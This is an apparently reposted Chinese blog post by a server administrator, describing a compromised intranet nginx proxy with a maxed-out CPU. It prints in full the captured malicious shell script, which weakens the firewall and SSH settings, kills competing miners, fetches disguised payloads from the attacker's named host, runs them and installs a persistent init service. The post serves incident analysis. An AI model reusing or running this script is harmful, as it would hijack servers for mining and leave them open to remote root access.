日常抓病毒
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了日常抓病毒,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含6516字,纯文字阅读大概需要10分钟。
内容图文
月常抓病毒水文
这次也是注入,不过都能搞到内网服务器了。
被入侵的服务器是内网的nginx代理服务器,默认文件倒是没有被删除,但跑满了的CPU实在不能忍。
抓到文件,就当是复习shell脚本了,技术不到家,代码容易被攻破啊。
攻击者获取文件地址:xia.beihaixue.com(香港)
#!/bin/bash
#chkconfig: 2345 88 14
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
#ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
#do
#pkill -f $procid
#done
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
needreset=1;
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
/etc/init.d/iptables stop
service iptables stop
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
pkill -f AnXqV.yam
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f my.confe
pkill -f pprt
pkill -f ppol
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
PORT_NUMBER=9999
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
apt-get install -y sysv-rc-conf
}
function downloadyam() {
?? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ?curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
?? ??? ??? ??? ?nohup /etc/my.conf &
?? ??? ?else
?? ??? ??? ??? ?p=$(ps aux | grep my.conf | grep -v grep | wc -l)
?? ??? ??? ??? ?if [ ${p} -eq 1 ];then
?? ??? ??? ??? ??? ?echo "my.conf"
?? ??? ??? ??? ?elif [ ${p} -eq 0 ];then
?? ??? ??? ??? ??? ?nohup /etc/my.conf -P ?my.conf>/dev/null 2>&1 &
?? ??? ??? ??? ?else
?? ??? ??? ??? ??? ?echo ""
?? ??? ??? ??? ?fi
?? ??? ?fi
}
function downloadyam1() {
?? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ?curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ?
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?nohup /var/ssh.conf &
?? ??? ?else
?? ??? ??? ??? ?p=$(ps aux | grep ssh.conf | grep -v grep | wc -l)
?? ??? ??? ??? ?if [ ${p} -eq 1 ];then
?? ??? ??? ??? ??? ?echo "ssh.conf"
?? ??? ??? ??? ?elif [ ${p} -eq 0 ];then
?? ??? ??? ??? ??? ?nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
?? ??? ??? ??? ?else
?? ??? ??? ??? ??? ?echo ""
?? ??? ??? ??? ?fi
?? ??? ?fi
}
function downloadyam2() {
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ -f "/usr/bin/yum" ]; then
?? ??? ??? ??? ??? ?chkconfig --add S67
?? ??? ??? ??? ??? ?chkconfig S67 on
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ -f "/usr/bin/sysv-rc-conf" ]; then
?? ??? ??? ??? ??? ?cd /etc/init.d/
?? ??? ??? ??? ??? ?sysv-rc-conf S67 on
?? ??? ??? ??? ?fi
}
while [ 1 ]
do
?? ?kills
?? ?#check
?? ?downloadyam
?? ?sleep 20
?? ?downloadyam1
?? ?sleep 600
done
内容总结
以上是互联网集市为您收集整理的日常抓病毒全部内容,希望文章能够帮你解决日常抓病毒所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。
来源:【匿名】